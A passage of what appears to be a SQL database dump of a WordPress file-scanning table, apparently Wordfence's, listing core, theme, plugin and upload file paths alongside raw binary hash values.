������*��P�ԁ�f','',0,'?'),('�O�X�g]<f@�','wp-admin/css/farbtastic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S@��[�\\,�3|��!','�Sm�\'�;d`��e�M�0i=�?>����?{','',0,'?'),('�3��Ƈe�(ú9�','wp-includes/js/jquery/suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('��b����N�8�hk�','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cW�U��ԟ�`B ','w�\r��j�*�m�l]� �t��PU�\r�E��','',0,'?'),('��\\�(��wB��I�','wp-admin/network/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�� ΒRU;�pp�b�','��,�!��m4f������NR�\n���B��^','',0,'?'),('�$�+K71�y(�F���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`{m�7�����I','��M^u�_Q��]������\n�Y�����','',0,'?'),('�(tTlDά7&��MP.�','wp-includes/js/tinymce/tiny_mce_popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('�/ �E:K�R寥�v�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��[�SPk�C�','��ںم�Ŵ��}C:�ø=�~��Q�(8��$Q','',0,'?'),('�6]\"�c���g�L>~.','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-300x250.jpg',0,'�*��c��E���','�*��c��E���','�-�ޟf��²�L��*��8Ӂ�����','',0,'?'),('�@�F �Ӡ(���e*[','wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-J�~�������','� |�D�O�?{��ٿ��%��ז�Y}��О','',0,'?'),('�B��ه�v<Sv稳','wp-includes/SimplePie/Parse/Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('�F���k�!T�y���d','wp-content/uploads/2019/12/pexels-photo-164005-300x200.jpeg',0,'���R3�]���j\"��','���R3�]���j\"��','Y/;t�G\r�~�u.�����<n��Lj���~','',0,'?'),('�F� �GJ��B��s7�','wp-includes/js/media-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)�����rB�','vK��UZ�3 7��Y8z}���Nr��a�Ѹ�B�/','',0,'?'),('�MȮs����%}�+=�','wp-includes/blocks/latest-posts/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�?���!֤��','�^�x��2\\�f_��(�A�o�֦��&I��b','',0,'?'),('�W= \\\'x\"�W��}��d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���թ�K���^㥾�','�M�8:�naƋGZ�qQdý!����\'��&g1','',0,'?'),('�X|F�g�/�hWAx��','wp-content/uploads/2019/09/garden-768x512.jpg',0,'Ջ�w�j�[�b��Q��','Ջ�w�j�[�b��Q��','�)�sT��F��d\0�Tv��`i?\ZP��}[�8�','',0,'?'),('�Y��ػ�甩���*�','wp-includes/css/dist/edit-post/classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��t�]�CY�Y@','W�gT�aWq�h�C�14��\'�j#����ջ�','',0,'?'),('�_&�����H���g�','wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uׂ-%�?�\'���tJ��','���B��]��>LZo�#Q�^V�x���#�','',0,'?'),('�_��-�,�L^�]H�','wp-content/plugins/wordfence/css/main.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8/�_NN���7�','pE(���4,�G�i�:��UML�k5�Y��','',0,'?'),('�`|y���� �I�hv3','wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�v�ǐ�)ѿ��Ux�','��H�a]�K� ��h]��ͨ}ѥk�%����L�=','',0,'?'),('�j2�+! ����t�.','wp-content/plugins/wordpress-seo/css/dist/featured-image-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�.� N�|8��b��','�Ī+4c�]�F�� �v�+��D��E&','',0,'?'),('�p)�T\Z35�������','wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�6���V�\'<Ǐ4��','i�#fZЩ���2�o�?���^5/d��X^G���\'','',0,'?'),('�p�x��\\?;�hE/��','wp-content/themes/twentytwentyone/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��_��^�Z�Dð�','�Zʀ UF����|c\'Fm!ԡ|~dkpF��','',0,'?'),('�w��5���)���','wp-includes/css/wp-embed-template-ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)6�� ؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('�}�k�E���MTXF','wp-content/plugins/wordpress-seo/languages/wordpress-seo-es_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�h�t��.�đ_�?','�����yo��Uf\\Z\Z�\n\\`p�酁�[��','',0,'?'),('��\0���+OW+�','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�]�#��N�X�,�','�Dz�\n�}_��7x,�9�t:��\'�\r����','',0,'?'),('����.M2���\\�','wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������7~�+��','gs\"�\\*5�ʷ��䕁�n�o���|U�w�S%�','',0,'?'),('�����A���1\Z�;�','wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4|����e��(r',':��.,�0aH�A��\05:�f�s\nf������','',0,'?'),('���]�5�K���^\r�','wp-content/plugins/wp-cerber/admin/cerber-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';F�,:\r���#+�>',':pB�}�283�` i�H�p���\Z�/ֺݛjd�','',0,'?'),('���nM\02]\r^�r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/\n�Bt�;','VYj8�b��5�f�c]�7W�iƘ2H�N}�2�^','',0,'?'),('��{��h���B-o:Ih�','wp-includes/blocks/query-pagination-numbers/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�?,Q?��B��1=�','�l��N����� Ж?SǷ����j,�h�T','',0,'?'),('��oZ�n�W���_A��','wp-content/languages/plugins/wordpress-seo-en_GB-80fdfb0cb940461f0eeb5fa22ca9ee20.json',0,'en8?ͼ*.9���\'�','en8?ͼ*.9���\'�','��ٳ�B���{�W�jw�%���X}����T�w\0','',0,'?'),('��W�^�����T��,','wp-content/plugins/redirection/models/htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�RV�ۛ�lkMC�v','�s�T=k,��dś�$�\"Z1:�T%�\r}+ԇ','',0,'?'),('��D���\n���+CP�','wp-content/uploads/2019/10/plumbing4-300x200.jpg',0,'��vA��ϴ�5��h���','��vA��ϴ�5��h���','rK|�� �$u&�\\oM&����*��ו�X�','',0,'?'),('���v�A\nGr�3C9`','wp-admin/includes/class-wp-internal-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^I[8T䍍�\\��=','Y^9�A\r+^-��iL�W��j��O���F��','',0,'?'),('�����[G�S ԚZ�Q','wp-content/plugins/redirection/models/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*������XZ���=','\'�R\\p��}s��\Z�db:F�ի 5š�','',0,'?'),('�\Z�R虒�<Fc֛;�','wp-content/plugins/wp-cerber/assets/flags/mp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4^�>!i��2D�h�','�k\"�z�ƽ��A��i�s\"A�ǽ��(\Z9','',0,'?'),('�c �(��q3˭�','wp-content/plugins/wordpress-seo/src/deprecated/admin/class-recalculate-scores.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����iv�-C�4�','4$�8Zp5C�^�D@�w��Ho��%�����','',0,'?'),('�.�����7杛 �','wp-content/languages/en_GB-f575f481034e90e21d832e415fd95fcf.json',0,'�\\���ֱ��o�P�','�\\���ֱ��o�P�','�r�g��Qx�d�*����f�\r�7|,���;�','',0,'?'),('�3X�/�����\'��P','wp-content/themes/twentytwentyone/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���ڧ�)E(\Z�U','E���1&�km��{�����\0Ғt�nɿ�HV','',0,'?'),('�4mo~\"f��h��1��4','wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@[�y��^�U\n�','C�V�����@p4�K�@o9ٖ�T^����=���','',0,'?'),('�Ebl8�y���}����','wp-includes/js/tinymce/plugins/link/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('�O�����^kz�o�>t','wp-content/themes/vega/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ȺbL�v*�}����=�','��\Z# y���R#i\r!H���Ko�������ǒ�','',0,'?'),('�W�nJ�.\'/x��','wp-includes/blocks/embed/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�#����}�5#','�f2�I���\\�V�sb�Z��efA���','',0,'?'),('�m>�\0��0X&�^�Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pKz��`�)9_@�','��aғYe�q�7YTc�Ȋi$�W�ت�/�!�,','',0,'?'),('��Ǔ��肴����l','wp-content/themes/twentytwenty/assets/js/editor-script-block.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�Q~�.Yf�1:D',':馈���x�t[cJ��=�\Z�\Z���h��0','',0,'?'),('��oVu�4���;f��','wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d����uI��(��Y��','�\\Ou�ip\'(y]�� ���+�\nZ���<}��','',0,'?'),('��?���z6���aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�и+:3�XnN�tex�X','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����{W�7h>���','� 2m��w��3�)zWg��v{Af��Hu`Co','',0,'?'),('�����Ș � \0}�P','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�*2�*ZY.�?�8�','LOo�Mٸz�ӫ7!���*����s�-���&','',0,'?'),('���ʆ��n�D㮖�(','wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B���/*�����zM^','���-9�4�<0���]lsS�ď��<I����','',0,'?'),('��j����5��f�j�','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��L|�y+5*�M\0Qk','�����O�q��Fri���e�+�K� �/;C','',0,'?'),('�����[�_�d�Ţ�','wp-content/plugins/wordpress-seo/src/presenters/admin/auto-update-notification-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��:�{I����','�H����|��������I-���x�d','',0,'?'),('��\Z��}��Qi�x\nx','wp-content/plugins/wordpress-seo/languages/wordpress-seo-en_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','זi��X�� w�N�Fx','�$��#�C��5+FJ\"�4��<TR�BM���','',0,'?'),('�\r�\r=�c!�_�p�)','wp-content/languages/themes/twentynineteen-en_GB.po',0,'6f��T�mu�c�','6f��T�mu�c�','�ΐ\n��PpC�tʘZju[����l����@�','',0,'?'),('�)ũ��2[� �4�_a','wp-includes/class-walker-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('�+o�2��8�E�+K%;�','wp-includes/PHPMailer/PHPMailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�\n�L�)��8�','�GK#I:�4ڄ`��\'�x�ժ\\���_இ6�','',0,'?'),('�:+[��g��CZ���','wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z� ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�H Ɩ86���In�','wp-content/plugins/wordpress-seo/src/loadable-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\;��T��U�*��@l;','�c��Ԥ\Zh��EA�2�f�ԾI��Ɲ�x�-','',0,'?'),('�H�F���I!���M9','wp-content/plugins/wp-cerber/assets/crb-logo-vn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��h��%t�J���','�Q��6�������V���\0\r��M�9��','',0,'?'),('�i2O���+�s�X.�','wp-includes/js/jquery/ui/core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PC��\r�{�tk�\"x',' �S�����3~�n�F#�EHf�_��7qY@I��','',0,'?'),('�����b]�ٺ=�0_','wp-content/plugins/wordpress-seo/src/conditionals/news-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�`����3�*u','�y��!p˫�?�6��={�V�m4$��j`��','',0,'?'),('��(�*W�^�����z�','wp-content/languages/plugins/wordpress-seo-en_GB-9786a7a9aec3e7d586f9e0ff0b772f22.json',0,'Eqs;�z[��>� 2�<','Eqs;�z[��>� 2�<','�����,�\Z��ֶIj[��p?�a�Os-l�','',0,'?'),('���P���M�˝�=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʿm�\\m10��f*�)',' m��Y�_����\\\'.��]���WyW0��0','',0,'?'),('��>ݶ�����߁��','wp-content/plugins/redirection/database/schema/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�! \Z�A�[4�\n�','�F5J��|M�[���,�K��b�(�5Ҏ7�.n','',0,'?'),('���e��-\n�yV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('����O��<Y�P�[�','wp-content/plugins/wordpress-seo/languages/yoast-components-nb_NO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\���(�:�A','�$ܮ��Nr��W� ��uBZ��eF���','',0,'?'),('������PU��ac��','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YA��G=b�u���','z�,ͥ���t <{@Y{�iy��s���c�(S�L','',0,'?'),('������O�f��q~�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-it_IT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���Vmo�����','2&/�(8���|#�n�@;��3$�7','',0,'?'),('��nv��Z�YV��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x9S���\r�u�>',')6�H�$�/�j2m���O�o�<4�v)�giAp','',0,'?'),('��J��\Z�W��o','wp-content/plugins/redirection/database/database-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ݜ�d�v�','Z�Z̨�3Sε�6b�Z�o�E�s�8�Ü�Ď�','',0,'?'),('��H�#��ým|�e','wp-includes/pomo/pomo/streams.php',0,'�����p�5yN.��&','�����p�5yN.��&','�Ό��!-�ʉ�^;�#��Ut�\n�W^���YG5','',0,'?'),('�Z��D��l�=�컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]oFo�O�\"I�R��','�L�H�?-Z(G �I�L��L�Dν\Z�����۲|','',0,'?'),('�\Z�������B~W�b�','wp-content/plugins/wordpress-seo/src/values/open-graph/images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�1��8���3��1�I�','�2���ʏE�t��6.F�{����G�A���q�','',0,'?'),('�!\"ro�ɿ��M�8�','wp-content/themes/twentynineteen/inc/icon-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�:L���o#5]Z�',')��D��7��^�ޞ��>���?}���4u����','',0,'?'),('�!�d�{�:ɬ�P ](M','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7��D\'_�y��)*','a!\\y\0�~�Ε�d�s��R�bdP��\"�\0�-\'','',0,'?'),('�B%v6�I\"Jb��4ӡT','wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�0iNj�����','�Lo(��m�ؾT���k�%<P!w�/\n�','',0,'?'),('�BK�@�~&�^��8','wp-content/themes/twentynineteen/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h��A��=N�V�','.D<1Z=�VMܟ�|��MS��q�į瘫x�','',0,'?'),('�F$������=2gx@�','wp-content/uploads/2019/08/Massages-150x150.jpg',0,'[��I\'x�8A�1G�J','[��I\'x�8A�1G�J','��S!��k�7}Հ���\"���D��T=0��','',0,'?'),('�\\����X�:��k','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z������� 6�>','��@⣂�L�EQ��(�ie��q[N|&���Ð�','',0,'?'),('��A�,T��d�&� 0','wp-content/uploads/2019/09/garden-waste.jpg',0,'��`*�G��?�6�-�','��`*�G��?�6�-�','@����\n�$%.46��n���0�o�{Z�^','',0,'?'),('���[R��~���c�*','wp-content/uploads/2019/08/business-training-350x220.jpg',0,'\'��Es�$ґ�����','\'��Es�$ґ�����','��V�����ie�-GN�6\\\0*�o��*�ĢA��','',0,'?'),('��3��4=�Ř����^','wp-content/themes/vega/assets/js/jquery.smartmenus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z4v�����zF�','�y\n�8bi��@5[8��Eu�rL�I���cy','',0,'?'),('����I6���F�','wp-includes/blocks/rss/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���\0!!i��','�u��\r�>u`�37(�F�^� �)L�}�(�\"l','',0,'?'),('��>�A�B�7�Sz!�e','wp-admin/includes/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H?���i��VJ�Ű','�^��AGx������z���<�I��K=��H','',0,'?'),('��|0���O�+�]lU�','wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'h����������(','��\"�Y\n+�,�U��2����[�-Q���','',0,'?'),('��\n�8�^XQ��-�l','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/ParameterBagInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�P�H�S�E\\-��R','k�ٽ�+��/���2�\n� Kl�k�\Zv ���','',0,'?'),('���+�v��2�����','wp-content/plugins/disable-gutenberg/disable-gutenberg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���z4l�Mz�D��U�','�h�R�h\"�U|ߢ`jB[�U\Z��2�\"-��e','',0,'?'),('���T�양�:t[��','wp-includes/Requests/Exception/HTTP/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�$�-4�3R�ۢ�U�','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),('�65\nN���x/\0���','wp-content/plugins/wp-cerber/assets/flags/mo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����aM7-�VD��%�','��K����v�FI���ۨ�0g��h�HV�R','',0,'?'),('���s?��P�h#�%�','wp-content/plugins/wordpress-seo/src/integrations/blocks/structured-data-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����lgfJ�4v�X\' ','YӾC�:C�Nh_�w��4M��8JP�1>a�','',0,'?'),('�)����Yh�.�;��š','wp-includes/Requests/Exception/HTTP/412.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zcu� L����t�p','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('�,��F1,iI��s��','wp-content/plugins/wp-cerber/assets/fonts/roboto/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�6ɮ�ͯvB,O�','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('�1�eU��MV��^��','wp-admin/includes/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��銻~F�a8U�\'v','��j{y˔���5N�1��ޝ���2콲��','',0,'?'),('�F_q���C�F!o4p��','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��x����h3\\','��U�~��A�Vkr�%R�x$p��Z1�\"�U�','',0,'?'),('�N6?`$�Qil�L','wp-content/plugins/wp-cerber/assets/flags/pe.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:���Z�d�D�\'y�1','8����,0��M߀�����҃��WO1q�','',0,'?'),('�P�4ՓQ�)zS���','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M���G�ᆻ��$','*+���\0%G�;�_dE}u�-��4w�\"�','',0,'?'),('�SK�8kf�k��X�ҍ\\','wp-content/plugins/wp-cerber/assets/flags/ke.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��K�PS���P�X','�_��/�6�pp���� 6�4�zI\0ֱ�Éf','',0,'?'),('���y�0s���?','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-category-permalink-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{s#��%ŷ�','5Y3|��q\\(�b��y�`���HV�v�3OG','',0,'?'),('���Fճ�D~֫�Cʽ�','wp-includes/css/dist/edit-post/classic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֶU����M��m�','�Ȓn�x(n/ſ���X>�v)�x������J','',0,'?'),('��\0�>#����z(','wp-includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';.h�;tA����k','@!9�Yc*��<��:����ﭕrw�שD�','',0,'?'),('���������}��','wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�W݈\\w&�c�P�','���j�+��]-�HO����gĩ>\"��O�,','',0,'?'),('���@��\'�y����q�','wp-includes/blocks/query-pagination/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�2�;���\0�a�*E','����`��E� �!w�w�������q�Y��sf�','',0,'?'),('�K��c��1%[{�','wp-content/plugins/wordfence/modules/login-security/css/login.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��\0|�\Z1��\r','�F\rw,�K��_�m�-��N���\"*�t��F�','',0,'?'),('��kV��7���2�+','wp-includes/blocks/heading/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Fs)�#�1��� ','�|\Z��6���Q_R�|��)Eo�vS�w,%�~�','',0,'?'),('��u�6g��*��$!68','wp-content/plugins/wordpress-seo/src/actions/alert-dismissal-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�w�B��\Z�t\0�o','�a�p@�n�6{U0���\r�T�Y�6c��=T}n','',0,'?'),('��J�H6�KF��p~�','wp-includes/blocks/social-link/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W���M\"�:*�7�>','����yR���U=FfA�o�*�s�G\\+�p*�','',0,'?'),('���P�w���0�h�9','wp-includes/js/tinymce/plugins/fullscreen/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�;j��|�:1/��','wp-admin/site-health-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��N�.�(��9�J:','#��2]�_(��iqi�Q5�)5W�J��f�3�','',0,'?'),('�=�IU��c�O�G�','wp-content/plugins/wp-cerber/assets/flags/fo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jX�?c0<G�Ia~�','��lNw�ʭ�!X�uw���_9{-]L��/ܐ','',0,'?'),('�@�ā �^(Q������','wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers-150x150.jpg',0,' +���J�����gC�',' +���J�����gC�','�.0��N��_y�%��g�Y�\r��$�?D Ə��','',0,'?'),('�B y�w�+���|t��','wp-includes/class-wp-http-requests-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('�J�&_#��3S�q���','wp-admin/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6����� B��4�6','',0,'?'),('�V+@�0���p�ɏhi','wp-includes/rest-api/class-wp-rest-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('�Z���)_��w�\'$�X�','wp-includes/class-wp-block-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�}�C�1gGr*� �7','&t�]�Y`�쿨�9}���܇W���-','',0,'?'),('�^Sx_?u�G�D���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�d9<C�ˤ���bl','K�.Bo����ࣸ�v��b�%����S~1�K��','',0,'?'),('�b~5�a���I@)*�','wp-includes/class-wp-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eo��C�I�7#�\n��','-�h���ʠ^�F�0?�0\n�%s�ibV\\�X�','',0,'?'),('�fG<�@៝N���-','wp-admin/includes/class-wp-privacy-requests-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z|���f����?','z�\\��?��+i.��x�7�j���.i����','',0,'?'),('�x9p�2���w���B','wp-includes/ms-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('��-�y��[�(�<�%C','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�!hQk�ө��Q���`',';�ǐs��:��;Mȴ�N�x�Cd/��+�','',0,'?'),('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('��e��-osŕ;�/�','wp-content/themes/twentynineteen/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','条�~��.U�WQ��','�z7��4��|X1����#��{/�Yio�(','',0,'?'),('��!��E��S7�x����','wp-content/wflogs/rules.php',0,'LP���8ϒ��v�K��','LP���8ϒ��v�K��','\n��an Zx���£����%P$wp\n�;;�~s�','',0,'?'),('������>2\\o�)���','wp-includes/Requests/Exception/HTTP/Unknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Ņ\'�k?�:~����','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('���3v�U�\Z3�P�^O 